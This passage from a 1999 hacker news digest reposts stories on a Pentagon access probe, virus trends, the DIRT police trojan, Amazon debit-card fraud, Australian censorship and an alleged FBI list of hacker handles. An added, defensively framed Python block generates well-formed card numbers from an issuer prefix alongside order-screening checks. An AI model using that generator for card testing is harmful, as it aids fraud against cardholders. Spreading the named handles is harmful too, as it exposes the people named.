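    print(verify(RFC2617_EXAMPLE, "POST", rfc_lookup, nonces))  # False: the method is hashed too
    print(verify(RFC2617_EXAMPLE, "GET", rfc_lookup, set()))    # False: nonce never issued
```

Digest keeps the password away from a passive observer, but it does not encrypt the request or response body, and the check above is only as good as the server's bookkeeping of which nonces it issued and when they expire.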
ZD Net
,4586,408287,00.html

@HWA

29.0 Pentagon Investigates Computer Security Breach
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 30th
From HNN contributed by RickDogg

An employee of the Defense Threat Reduction Agency is under investigation by the Air Force Office of Special Investigations for allegedly seeking unauthorized access to the computer system of a coworker. Evidently the employee requested access to a senior official's computer while the official was away. The request was denied and no access was gained.

San Jose Mercury News

Posted at 9:22 a.m. PDT Tuesday, June 29, 1999

Defense employee faces probe over computer incident

WASHINGTON (AP) -- The Pentagon said today it is investigating an attempted computer security breach last week at a defense agency responsible for reviewing sensitive technology exports. An unidentified employee of the Defense Threat Reduction Agency is under investigation for allegedly seeking unauthorized access to the computer system of a coworker, agency spokesman Clem Gaines said.

Gaines said the employee under investigation by the Air Force Office of Special Investigations had requested access to the government computer used by Peter Leitner, a senior advisor to the defense agency on matters involving exports of sensitive technologies. Gaines declined to identify the individual. The individual's request for use of Leitner's computer was denied and there was no security breach, Gaines said.

The unauthorized request for access to Leitner's computer was made June 24, while Leitner was on Capitol Hill testifying before the House Committee on Government Reform, Gaines said. Leitner has rankled some in the Pentagon by charging that senior defense officials have glossed over concerns in the lower ranks that U.S. businesses were allowed to sell China and other countries technology with military applications.
Gaines, the agency spokesman, said he could not discuss any details of the computer security investigation, which was requested Monday by the agency's director, Jay Davis. Pending the outcome of the investigation, the individual has been temporarily assigned to other duties, which Gaines did not specify.

@HWA

30.0 What will the Next Generation of Viruses Bring?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 30th
From HNN contributed by Deepquest

Melissa and WormExplorer were devastating to business and governments world wide. As viruses get more sophisticated and virus writers get more creative what sort of viruses can the world expect to see in the next six months or a year?

BBC Sci/Tech

New virus spills your beans

Virus threatens document security

A new strain of computer virus could distribute your highly confidential documents all over the Internet. Anti-virus developers are warning that they cannot develop an antidote until the virus appears. Far from destroying vital files, the virus will make sure everyone can see them.

The new virus is expected to be a variant of either Melissa or the Explore.Zip worm, both of which have cost businesses millions in recent weeks. Both Melissa and the Explore.Zip worm rely on people opening email attachments. Once into the computer the virus sends a message to everyone in the victim's in-box and then destroys every file written in Microsoft Word, Excel or Powerpoint, among others.

New virus on the block

One variant has already appeared. PrettyPark replicates itself by sending copies to everyone in the victim's address book. It waits silently until the victim is on the Internet, then sends lists of the victim's user names, password files and address lists to Internet Relay Chat channels.

Anti-virus developers are expecting the next step to be a virus which roots around in your files and then posts your documents across the Internet. "The virus wouldn't be able to tell which of your documents are secret. It might just post your shopping list, or it could be a highly sensitive company document. "What's more, it would appear as if you sent it," says Graham Cluley of Sophos Anti-Virus.

Several anti-virus makers already have an answer to PrettyPark. But they cannot build a defence against future variants until they encounter them.

Java and ActiveX - next infection target

It is predicted that the next generation of viral infections will hit small Webpage programmes called applets, written in Java and ActiveX. A recent survey revealed that more than half of medium-sized organisations using an intranet had no security policy in place to respond to the threat of attacks on Java applets. Recent estimates indicate that Melissa, Explore.Zip and other malicious attacks have cost US business $7.6bn this year alone. The viruses cannot infect Macintosh or Unix systems.

@HWA

31.0 DIRT still Around, Used by Law Enforcement
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 30th
From HNN contributed by wannabe

We have all heard of BO (Back Orifice) or NetBus but what about DIRT? DIRT stands for Data Interception by Remote Transmission and is a commercial software package only available to law enforcement officials. DIRT, like BO and NetBus, allows remote control of a PC with or without the user's knowledge. Unfortunately this article makes no mention of whether it is necessary for law enforcement to get a search warrant before they use such a tool.

PC World
"/article/0,1510,11614,00.html

Correction 1615EST Evidently the above story does mention that a search warrant is needed before law enforcement can use this tool. Unfortunately we missed that information. The story does mention that Frank Jones thinks that the Cult of the Dead Cow stole the idea for Back Orifice after seeing a DIRT demo. We have received staunch denials of this accusation from several members of cDc.

PC World;

Getting DIRT on the Bad Guys
Here's the ultimate weapon in the war against cyber crime.
by Tom Spring, PC World
June 29, 1999, 12:23 p.m. PT

To former detective Frank Jones, "secure network" is an oxymoron. The word "delete" isn't in his vocabulary. Password-protect your computer and you'll make his day. And if you really get on Jones' bad side, he'll take complete control of your PC--and your first clue will be when you open your door and the boys in overcoats start flashing badges at you.

If you're among the anonymous thousands of cyber bad guys who inhabit the Internet's underbelly, Jones is your worst nightmare. The retired New York City detective works on the law enforcement sidelines building software tools to help the government and police crack down on online criminals. And his latest tool is considered the ultimate weapon.

Digging up DIRT

Jones wrote the widely used, but little-known software program called DIRT. The program works like a telephone wiretap for computers, giving its users the ability to monitor and intercept data from any Windows PC in the world. DIRT stands for Data Interception by Remote Transmission and was originally created by Jones as a tool to help snare online child pornographers. But in the short time it has been available only to government and law enforcement agencies, DIRT is now used to battle hacker groups like Cult of the Dead Cow and to trap terrorists, drug dealers, money launderers, and spies.

"What we do is give law enforcement an additional line of defense," says Jones, the president of Codex Data Systems.

The DIRTy Details

The client side version of the DIRT program is less than 20KB in size and is typically installed on a target PC using a Trojan horse program (a set of instructions hidden inside a legitimate program). The DIRT program is usually sneaked inside an e-mail attachment, a macro, or a workable program that a targeted user is enticed to download. Once inside a target Windows 95/98/NT computer, it gives law enforcement complete control of the system without the user's knowledge.

It starts off by secretly recording every keystroke the user makes. The next time the user goes online, DIRT transmits the log for analysis. Jones says government agencies have even managed to open encrypted files by obtaining passwords from the keystroke log.

During a recent program demonstration, Jones easily uploaded and downloaded files to a DIRT-infected computer connected to the Net by a dial-up modem. Jones could upload and download files to the PC without a hint of activity on the other end.

Arresting Developments

If you think this sounds like B-grade fiction, it isn't. During a recent meeting of high-ranking federal and state gumshoes, DIRT received glowing software reviews. Many cited long lists of arrests thanks to Codex.

One police detective said DIRT has become a powerful tool in fighting crime online. It aids criminal investigations and results in about one arrest each month. Most of those arrested were suspected pedophiles, he said.

The hardest part of using DIRT, say its users, is getting owners of targeted computers to download the Trojan horse programs. Typically law enforcement tries to entice a targeted individual to download a program or a compressed file that must be "un-zipped" which contains the DIRT bug inside.

Because the program is not available to the public, DIRT is undetectable using virus scanning software, Jones said. "The only way to avoid DIRT is to ignore your e-mail," he says.

Fighting Fire With Fire

Jones says law enforcement desperately needs these tools to turn the tide in its battle against online crime. "Law enforcement is outgunned," he says. In an age where hacking horror stories have become front-page news, DIRT gives law enforcement an effective tool to even the score and catch the bad guy.

On one recent occasion DIRT was used to track a suspected drug dealer as he zigzagged across the country from client to client selling methamphetamines. His big mistake, police say, was keeping a client list on his laptop and logging into the Net each night to stay in touch with business associates and friends. Using DIRT, police tracked his whereabouts each night and took notes on who his associates were. The alleged drug dealer was eventually arrested as he was surfing the Net in a San Jose, California motel room.

A Form of Flattery?

Though DIRT is restricted to military, government, and law enforcement agencies, the "Back Orifice" hacker tool offers some similar tricks. Jones maintains that its inventor, a member of the hacking group Cult of the Dead Cow, attended Codex's first public demonstration of DIRT more than a year ago and slapped together an "imitation" of DIRT based on what he saw. "Close, but no cigar," Jones says.

But according to Mike Hudack, editor of an online magazine for hackers, there's more to Back Orifice than that. An updated version called "Back Orifice 2000" is expected to hit the Web in July.

Big Brotherware?

Hudack says the technological Cold War between white-hat hackers and black-hat hackers is just beginning--and law enforcement needs all the help it can get.

But others view DIRT as a potential threat to privacy, raising serious legal and ethical questions as a means of gathering information. To use DIRT law enforcement agencies must first obtain a wiretap search warrant. But privacy groups maintain that this type of electronic surveillance goes far beyond wiretap warrants because DIRT allows authorities to invisibly snoop inside a targeted PC's entire hard drive--not just monitor electronic communications.

"Throughout history law enforcement has had a long track record of overstepping its bounds when it comes to search warrants," says Shari Steele, director of legal services for the Electronic Frontier Foundation, the privacy rights group. Unless appropriate checks and balances are in place, Steele says, DIRT can quickly go from being an effective crime-fighting tool to a privacy activist's worst nightmare.

The American Civil Liberties Union takes a harder stance. "Clandestine searches like these are the worst kind," says Barry Steinhardt, associate director of the ACLU. "This is exactly the kind of search the Fourth Amendment is designed to protect us from."

@HWA

32.0 Debit Cards Not Safe on the Internet
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 30th
From HNN
contributed by mortel

Illustrating the problem of debit card use on the Internet, Don Garlock, a consultant for the Bedford County Sheriff's Department in Bedford, VA, describes his search for the people who wiped out his bank account.

MSNBC

The dark side of online shopping
Trail of fraud leads from Amazon.com to Thailand

By Molly Masland
MSNBC
June 24

When Internet investigator Don Garlock's bank account was mysteriously cleaned out in early June, the last thing he expected was that the search for the culprit would take him on a shadowy trail through cyberspace. The clues began at online retail giant Amazon.com and led to a ring of alleged hackers in Bangkok, Thailand. Along the way, Garlock picked up crucial lessons about the perils of online shopping, even at sites that claim to be "100 percent safe."

A CONSULTANT for the Bedford County Sheriff's Department in Bedford, Va., Garlock works for Operation Blue Ridge Thunder, a program aimed at stopping crimes against children on the Internet. Garlock has logged hundreds of hours hunting down pedophiles and child pornographers online. So when his personal bank account was suddenly emptied in early June, Garlock put his online tracking skills to the test. But even he was surprised by what he discovered.

FRAUDULENT CHARGES AT AMAZON

According to Mainstreet Bank Group, Garlock's bank, someone had purchased nearly $1,400 worth of merchandise at Amazon.com and charged it to his debit card account.
When the mysterious charges at Amazon.com appeared, Garlock immediately suspected fraud and called the online retailer of books and music to find out who was responsible. But Garlock was astonished to find that Amazon.com would not release any information to him about his account.

A customer of several years, Garlock had placed modest orders in the past, spending a total of $160, and had never had an unpleasant shopping experience at the online retailer's site. But Amazon.com would neither release the name of the individual who had purchased the goods using his debit card number nor tell Garlock what specific merchandise had been bought or where it had been shipped.

Amazon.com spokesman Paul Capelli said the company makes it a policy to release detailed information about an account only to a customer's bank, which can then release the details to their client. "We want to take reasonable steps to protect our customers' privacy," said Capelli. "We need to know we're dealing with the real customer, not someone calling on the phone who could be anyone."

As a result, the only information Garlock received directly was a hint accidentally leaked over the phone by a customer service representative. "They let slip the first half of the e-mail address, and then they realized what they had done and put me on hold. They came back and read me a prepared response to the effect that they could not divulge any additional information to me," said Garlock.

TRAIL TO THAILAND

Frustrated, Garlock was determined to proceed with his own investigation. While his bank began an official inquiry into the case with Amazon.com, Garlock went to work. Using the limited information he had obtained from Amazon.com, he uncovered a path of clues leading to a ring of alleged computer hackers in Bangkok, Thailand.

"The first part of the e-mail address given to him contained an unusual word and turned out to be what is a very common first name in that part of the world," he said. Garlock was able to uncover a wealth of personal information about the individuals who had used his card. With the help of ordinary search engines, he uncovered their home addresses, phone numbers and where they attended college. Garlock also found that in addition to having multiple e-mail addresses and Web sites touting their hacking skills, the alleged thieves held legitimate Web development jobs.

"We know a tremendous amount of personal, professional and business-type information on these people now from our investigations here in little old Bedford County," said Sheriff Michael Brown.

Eventually Amazon.com released the shipping address and fraudulent e-mail address used by the credit card thieves to Garlock's bank, but by then the information only confirmed the data he had already uncovered.

Because the sheriff's office has no jurisdiction in Thailand, the department turned the case over to Interpol, the international crime investigation agency that works with federal law enforcement agencies and national police forces. Garlock's case is under review and, according to Brown, will most likely be turned over to the FBI, U.S. Customs or the Secret Service.

MORE CASES OF FRAUD

In an e-mail sent to Garlock, Amazon.com's investigations department confirmed that the charges made to his debit card were indeed the result of unauthorized use. Mainstreet Bank Group said an investigations officer at Amazon.com admitted that the same group in Thailand had set up a number of other stolen credit card numbers for use at the retailer's site.

In a memo obtained by MSNBC, Shirley Schoefield, a bank investigations officer at Mainstreet Bank Group, said that according to the investigations department at Amazon, "approximately 20 cards have been set up for use to purchase merchandise to be sent to the following shipping address (in Thailand)." Citing customer privacy restrictions, Schoefield refused to comment on the case.

Amazon.com's Capelli also refused to comment on the case of the 20 fraudulent credit cards, but acknowledged that there have been instances of credit card misuse at the site. "From the time there has been credit cards, there has been credit card fraud. Bad things can happen any place, and the Internet is no different. Any retailer encounters this problem," he said. However, he insisted that Amazon.com's security system had never been compromised.

Currently Amazon.com is advertising for positions in its fraud investigation department. Under the section "employment opportunities" on its Web site, Amazon.com is looking for a fraud detection specialist as well as a fraud detection manager.

DON'T USE A DEBIT CARD

Garlock's situation was made worse by the fact that his debit card number was stolen instead of a credit card. If his credit card had been used fraudulently, according to federal regulations, he could have easily stopped payment on the account and would have been held responsible for no more than $50.

But since his debit card was stolen, he temporarily lost everything in his checking account. When a debit card is used, the money is automatically removed from the account when the order is processed. While the bank is still responsible for paying Garlock back, he must wait until the official investigation is complete, a process that can take weeks and sometimes months.

"One of the biggest lessons I've learned from this is, for God's sake, don't use a debit card on the Internet," said Garlock.

Amazon.com has a policy of fully refunding unauthorized charges billed to a customer's account and has agreed to pay back Garlock any amount billed to his account that is not covered by his bank.

HACKER AND/OR THIEF?
While it is clear that Garlock's debit card number was stolen and used illegally, what remains unknown is whether the thieves first obtained the number by breaking into Amazon.com's site, or whether the numbers were obtained from another source or even generated randomly.

Amazon.com's Capelli said that hackers have never broken into the company's site or stolen information on individual accounts. "Our system of storing credit card information has not been compromised, nor has it ever been compromised in any way. Any claims to this effect are not true, absolutely not true," said Capelli.

According to Inspector Earl Wismer of the San Francisco Police Department, which handles many cases of Internet fraud, "It's really difficult to pin down where exactly a credit card number was acquired. It is common for credit card numbers to be fraudulently used on the Web, but we're not able to determine whether the numbers were obtained from the Web or from some other source."

In addition to stealing credit card numbers the old-fashioned way, such as acquiring the number from receipts, there are several sites on the Web where hackers, or anyone else who's interested, can generate well-formed credit card numbers from the check-digit algorithms, or mathematical formulas, used by banks. The algorithms produce every number that passes the format check for a given bank's prefix, but they cannot say which of those numbers a bank has actually issued, so the hacker must then systematically try out each number in an effort to find one that is in current use and still has an available credit limit.

CROSS CHECKS NEEDED

Garlock's case is worrisome because no matter how his debit card number was acquired, the user was still able to charge a hefty amount of merchandise to a debit card account owned by a person living in the Blue Ridge Mountains of Virginia and have it shipped to an address in Bangkok without any alarm bells going off at Amazon.com. "Apparently their order confirmation system that would match a card number to a given individual is seriously flawed," said Garlock.
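The two points above in working code: a check-digit algorithm only proves that a card number is well formed, so "generated" numbers still have to be tried one at a time, and the order Garlock describes (his card number, a new account, a Thai shipping address) would trip a simple merchant-side cross-check. This is an added example, not code from the newsletter, MSNBC or Amazon.com. The mod-10 (Luhn) routine is the public check-digit scheme payment cards use; the card numbers are the well-known 4111 1111 1111 1111 test value and constructed variants of it, and the merchant records, e-mail addresses, country codes and `screen_order` rules are hypothetical.

```python
from dataclasses import dataclass

# Added example. Card numbers are constructed test values; the merchant
# records, e-mail addresses and review rules below are hypothetical.


def luhn_valid(number: str) -> bool:
    """Mod-10 (Luhn) check used by payment cards. Passing it proves only
    that the number is well formed, not that any bank has issued it."""
    digits = [int(c) for c in number if c.isdigit()]
    if not 13 <= len(digits) <= 19:
        return False
    total = 0
    for i, d in enumerate(reversed(digits)):  # rightmost digit is i == 0
        if i % 2 == 1:                          # double every second digit
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def luhn_check_digit(partial: str) -> str:
    """Check digit that makes partial + digit pass luhn_valid()."""
    digits = [int(c) for c in partial if c.isdigit()]
    total = 0
    # Positions shift by one relative to luhn_valid() because the check
    # digit has not been appended yet.
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 0:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return str((10 - total % 10) % 10)


def luhn_candidates(prefix: str, length: int, start: int, count: int) -> list:
    """Enumerate well-formed numbers that share an issuer prefix (BIN).
    This is all a 'generator' site can do: every result passes the check
    digit, but only the issuer knows which ones are live accounts."""
    body_len = length - len(prefix) - 1
    out = []
    for n in range(start, start + count):
        partial = prefix + str(n).zfill(body_len)
        out.append(partial + luhn_check_digit(partial))
    return out


@dataclass
class Order:
    card_number: str
    account_email: str
    billing_country: str
    shipping_country: str
    amount_usd: float


# Hypothetical merchant records: card number -> accounts that have used it.
KNOWN_CARDS = {
    "4111111111111111": {"garlock@example.com"},  # returning customer (constructed)
}


def screen_order(order: Order, known_cards: dict, high_value: float = 500.0) -> list:
    """The cross-checks the article says were missing. Returns the reasons
    an order should be held for manual review; an empty list means none."""
    flags = []
    if not luhn_valid(order.card_number):
        flags.append("malformed-card-number")
    if order.billing_country != order.shipping_country:
        flags.append("ship-to-country-differs-from-billing")
    prior_accounts = known_cards.get(order.card_number, set())
    if prior_accounts and order.account_email not in prior_accounts:
        flags.append("card-reused-by-new-account")
    if order.amount_usd >= high_value:
        flags.append("high-value")
    return flags


# The order in the article, reconstructed with constructed details: a new
# account using the victim's card, billed in the US, shipped to Thailand.
SUSPECT_ORDER = Order(
    card_number="4111111111111111",
    account_email="newaccount@example.net",
    billing_country="US",
    shipping_country="TH",
    amount_usd=1400.0,
)

if __name__ == "__main__":
    print(luhn_candidates("411111", 16, 0, 5))
    print(screen_order(SUSPECT_ORDER, KNOWN_CARDS))
```

The candidate enumerator shows why "generating" numbers is not the same as stealing them: with a 6-digit prefix and 16-digit cards there are a billion well-formed numbers per issuer, and only an authorization request to the bank tells them apart. The order screen, by contrast, needs no bank at all; the mismatch between a card's billing country and the shipping country, and the same card turning up under a second account, are both visible in the merchant's own records at the moment the order is placed.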
According to Capelli, the person who fraudulently used Garlock's debit card set up a separate account using the card number, but did not break into Garlock's existing account. Capelli dismissed the need for a more thorough cross check of credit card numbers with existing account information, adding that it is very common to have more than one account per card number. For instance, there are husbands and wives with different names who have different accounts but use the same card number. Or parents who let their children use their credit card number to set up an account.

As Scambusters, an online consumer advocacy organization, points out, the reality is that it's actually much safer to enter a credit card number on a secure online order form than it is to give a credit card to a waiter at a restaurant. But there are important security measures to be worked out before the process is 100 percent safe, despite what many online sites want customers to believe.

"There is definitely a problem and I think some people in the industry have known that it is a problem. It is not one that's going to be fixed easily," said Sheriff Brown. "Consumers have just got to be careful."

@HWA

33.0 New Definition of 'Computer Hacker'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 30th
From HNN
contributed by mortel

A woman in Grafton, Ohio has redefined the term 'computer hacker'. Twenty-nine-year-old Kelli Michetti, upset that her husband was spending too much time online, took a meat cleaver and attacked the home computer. She was fined $200 for her actions.

CBS News

@HWA

34.0 Hackers In the Workplace
~~~~~~~~~~~~~~~~~~~~~~~~

July 1st
From HNN
contributed by Whoever

Security companies claim that they do not hire hackers. In reality, are they actually actively recruiting hackers? Are they doing this because they know that not only are they the most knowledgeable but also the most loyal and hard working? A new HNN exclusive Buffer Overflow article examines these questions and more.

Buffer Overflow

@HWA

35.0 NPR Covers .gov/.mil Defacements.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

July 2nd
From HNN
contributed by oolong

In a rare moment of media impartiality, NPR's Morning Edition yesterday broadcast a piece about the latest .gov break-ins that featured an interview with Attrition staff. This interview properly puts the blame for the hacked pages on poor web server maintenance. This piece is in Real Audio format. Kudos to Morning Edition for being fairly impartial; hopefully it will not be too much to ask other outlets to follow their example.

NPR - print
NPR - Real Audio

"Hackers Strike Again

Over the past month, there has been a rash of computer hacker attacks on government web sites including the White House, the FBI, and the Senate. Earlier this week they hit the Army's site and Wednesday the National Oceanic and Atmospheric Administration's Storm Prediction Center Web site was disabled. In some cases, the hackers were able to exploit computer systems that have not kept up to date with Internet security alerts. Hear more as NPR's John McChesney reports for Morning Edition."

@HWA

36.0 Australia Passes Major Net Censorship Law
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

July 2nd
From HNN
contributed by photon

The Australian Parliament has created one of the world's most far-reaching online censorship laws. The Broadcasting Services Amendment Act will institute a rating system for Internet content. The Australian Broadcasting Authority will order ISPs to take down content on their servers rated X (Sexually Explicit) or RC (Refused Classification) within 24 hours of being notified. Opponents who failed to prevent the bill's passing hope that the decentralized nature of the Internet will prove to be uncontrollable by this new law. One loophole in the law is already being exploited: regulators forgot to include anonymous proxy services in the legislation.
Wired
MSNBC
Broadcasting Services Amendment Act
Australian Broadcasting Authority

Wired; Australian Net Censor Law Passes
by Stewart Taggart
8:15 a.m. 30.Jun.99.PDT

CANBERRA, Australia -- The political leaders of this nation on Wednesday passed into law one of the world's most far-reaching online content censorship regimes.

The rules -- which take effect 1 January, 2000 -- enable Australian government regulators to order domestic Internet service providers (ISPs) to take down indecent or offensive Web sites housed on their servers, and also require they block access to certain domestic or overseas-based content.

"We're on fairly new ground here," said Stephen Nugent, special projects manager for the Australian Broadcasting Authority (ABA). "The codes of practice envisaged under this legislation are probably more detailed, and cover a greater range of matters, than I have seen in any other country."

Known as the "Broadcasting Services Amendment (Online Services) Act", the measure was approved by the House of Representatives late Wednesday night, according to a staffer in the office of Communications Minister Richard Alston. The measure had passed the more contentious Australian Senate on 26 May.

The new law will institute a movie-like rating system for Internet content. The ABA will order ISPs to take down content on their servers rated X (Sexually Explicit) or RC (Refused Classification) within 24 hours of being notified.

For opponents of online content restrictions, the struggle will now shift to cyberspace itself. They believe the Internet simply will prove too large, too decentralized, and too fast-moving for regulators anywhere to successfully block access to any content for long.

Among the defiant is Perth-based online entrepreneur Bernadette Taylor. Known to her Web site admirers as a "Virtual Girlfriend," she offers nude photos of herself and personalized email communication to paying members. To Taylor, passage of the law merely begins a hide-and-seek game she professes little doubt she'll win. With a Web site housed in Dallas, Texas, she plans to stay one step ahead of the nation's blocking mechanisms for as long as the law lasts.

"With a bit of effort the ABA could find (and block) me every day but they'd have to spend five to 10 minutes doing it," she says. "In the meantime, I'm compiling a mail list which has all the people that want notification of where I am."

She believes her Australian-based users will encounter little ongoing difficulty accessing her site, either through using encryption software or through proxy servers that disguise the source of material.

One such proxy server has been set up by South Australian Web site builder and e-commerce businessman Mike Russell. By visiting it, Australian Web users will be able to access any site they want without disclosing where they're visiting. Since banning proxy servers isn't included in the legislation, Russell says there will be little Australian regulators can do.

Among other defiant gestures, Russell is calling for a worldwide boycott by Web sites of visitors from Australian domains -- recommending all such visitors be redirected by webmasters to the home page of Electronic Frontiers Australia, the online civil liberties group that spearheaded a failed effort to stop the law.

In introducing the online content legislation, the center-right government of Prime Minister John Howard argued that some controls are needed to limit access by children to pornographic content on the Internet, as well as other material that could be deemed offensive.

Passage of the law comes amid research showing Internet use is rising rapidly in Australia. Figures released Wednesday by the Australian Bureau of Statistics showed nearly 18 percent of Australia's households now have some form of Internet access -- a rise of nearly 50 percent in one year. Nearly 40 percent of Internet households in Australia now access the Internet on a daily basis, the researchers found.

To Grant Bayley, a Sydney spokesman for 2600 Australia, an organization of technology enthusiasts, the fact that the law comes into force on 1 January, 2000 provides at least one indication that Australian lawmakers may not have been fully cognizant of all the issues involved.

"January 1 is not going to be one of the best days in the world to implement this," he said, referring to the long-feared Year 2000 problem in which worldwide computers may start acting up due to the millennial date change. "There are going to be much bigger problems around," he said.

@HWA

37.0 Hacker Crackdown, is your nick on this list??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From: FBI releases hacker list -- Saturday June 27 -- 11:00 SCT

The FBI has started an all-out war on hackers and the like. They have received monetary funds from the government and are monitoring many servers; there is a possibility they are monitoring a few EFnet servers, but other than that agents go online posed as regular people. They also are monitoring DALnet and are considering going on UnderNet next. Watch your backs.

With the funding, the FBI has invested in much equipment and software for many things, but the main thing it goes toward is _REWARDS_. If you provide the FBI with information leading to the prosecution of a hacker you are rewarded $5,000-10,000, and they are targeting many young people in groups. Their tactic with young people is to scare them with lines such as: "Are you gonna cough up the info on your buddy or be the first 13-year-old in federal prison?" So groups, watch your little ones.
Check the list out below.

IRC Server: Channel #crackdown

----------------------------------------------------------------------------

AntiOnline Receives Directives
Thursday, May 27, 1999 at 11:59:27
by John Vranesevich - Founder of AntiOnline

AntiOnline has received directives given to several ISPs listing the groups of hackers and hack groups that they're currently targeting. Sources faxed AntiOnline the 6 page directive which begins:

You are hereby requested to preserve, under provisions of Title 18, United States Code, Section 2703(a) (unopened e-mail), (b) (content), (c) (logs and records), and (f), the following records in your custody and control, including records stored on backup media:

The request then goes on for 6 pages listing hackers, groups, and media currently under investigation by the FBI. The list contains not only the hackers' handles, but in most cases, their real names. For the privacy of those involved, AntiOnline is only publishing their aliases.
Here is a partial list of the individuals on that list:

Sate mz_chick epoh Anacarda kimmie badfrog Becky iCBM rox Code0 Codex Sygma Cyberfire DigitalX Ibanez Spaceg0at Downfall Duk0r elf solarix VectorX f00t f0nz ganja Vie IO Cl0pz Bladex vallah jenna coolio hamster prym tr0n lure LD shortee LongDistance lothos blackhappy darkfaery crazygyrl Diesl0w blanc 09 Acidkill Phear nonlinea optic Overdose P0rt MostHated fryz hyrid ghost Rizzy prophet shdwknght sidney status taylor Texan Borgie d0lz timebomb Blakforge Type-0 watchy wolf303 wookie Yorph random totempole cyberf|re jos Mcintyre Eckis Twisted-- Pantera angelo espionage fenderkev ne0h digital- ID-50 taylor cult_hero socked problem mal_vu minos series ben-z rslink- judy

The directive goes on to request information on:

Directories, files, logs, records, information or any data concerning IRC Channels visited by Hackers or individuals listed in paragraph 1, specifically:

It goes on to list the following IRC Channels:

#creep #j00nix #tk #pascal #ex0dus #faggotsex #gayfagsex #gaysex #hackunix #hax0r #lezbiandsex #linux #sex_gay #sex_pl #shellx.log

Section 5 of the directive requests:

Directories, files, programs, logs, or data concerning the Names of hacker groups:

This section goes on to list:

GlobalHell gH milw0rm Total-ka0s tk Darkcyde D4rkcyde 2600 world domination enforcers enphorcers hackphreak

Section 7 requests:

Victim names or known victim identifying numbers, such as names, addresses, and telephone numbers, concerning the Individuals listed in paragraph 1, or listed below:

Section 7 goes on to list:

Meeting Place At&T Latitude Sprint MCI GTE Alltell Steve Huron Josh Teplow 1-800- 1-888- DCCCD LCET Walburg Dillon Reed 3-com 3com

As ALWAYS, AntiOnline will bring you the latest information as it becomes available.

IRC Server: Channel #crackdown

----------------------------------------------------------------------------

FBI lurking on IRC
May 30, 1999 - 22:07
contributed by: BinaryZer0

From an unidentified source, I, and others, have been told to keep quiet on IRC's EFnet, especially the servers. Why? It is possible that the FBI received cooperation from officials, and the FBI is now sniffing the server. It is possible that they are sniffing out words like "hack" with a similar type of contraction as "grep". This is due to the recent hacks of government sites, and the involvement of gH members (who hang out on EFnet). Further details will, somehow, be investigated.

IRC Server: Channel #crackdown

----------------------------------------------------------------------------

As I have been told, a few people were raided a few weeks back:

Becky-
fryz
MostHated

Nothing really has been pinned on them. More can be discussed on the IRC server, port 6667, in channel #crackdown.

-missnglnk

@HWA

-=--=--=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-
THE RUMOUR MILL
-=--=--=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-

Rumours:
~~~~~~~

Send rumours in, or join our irc channel and gossip!! tnx ..

+ has had a facelift, check out the new look and leave your comments to astral on how you like it...

+ Help! net-security is changing servers and may be down for a few days while they overcome some new server teething problems (probably dns related). See elsewhere this issue for more details ...

+ HNN: contributed by Space Rogue. HNN hopes everyone has a fun filled Fourth of July weekend. Note that there will be no news update on Monday. Be sure to check in next week as we attempt to update the site remotely from Defcon7 in Las Vegas. We should be ready to announce the HNN T-shirts that everyone has been asking for on Tuesday.
Oh, and SETI@Home released version 1.5 of the SETI software last Wednesday which fixes quite a few bugs (with all the news lately we forgot to mention it). Be sure to join up with the HNN team as you search for that Anakin guy.

HNN Team for SETI@Home

AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

*****************************************************************************
*                                                                           *
*                               ATTRITION.ORG                               *
*              ATTRITION.ORG Advisory Archive, Hacked Page Mirror           *
*              ATTRITION.ORG DoS Database, Crypto Archive                   *
*              ATTRITION.ORG Sarcasm, Rudeness, and More.                   *
*                                                                           *
*****************************************************************************

[FREE KEVIN banner]
www.freekevin.com - Support www.kevinmitnick.com, the Free Kevin defense fund site, visit it now! FREE KEVIN!
www.2600.com - One of our sponsors, visit them now

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to         //
// hwa@press, put AD! in the subject header please. - Ed                    //
//////////////////////////////////////////////////////////////////////////////

@HWA

HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~

Don't worry. worry a *lot*

Send in submissions for this section please! .............

From ...

JP offers a public personal insight into his family
Contributed by mkatona
Tuesday - March 02, 1999. 05:09PM UTC

In an off the wall media report, AntiOnline's owner, JP, reveals personal information to the world:

"It's no secret my Father was a famous actor. And instead of letting the rumor mill swallow this down, I would rather tell it like it is.. Yes my father was Beaver Cleaver."

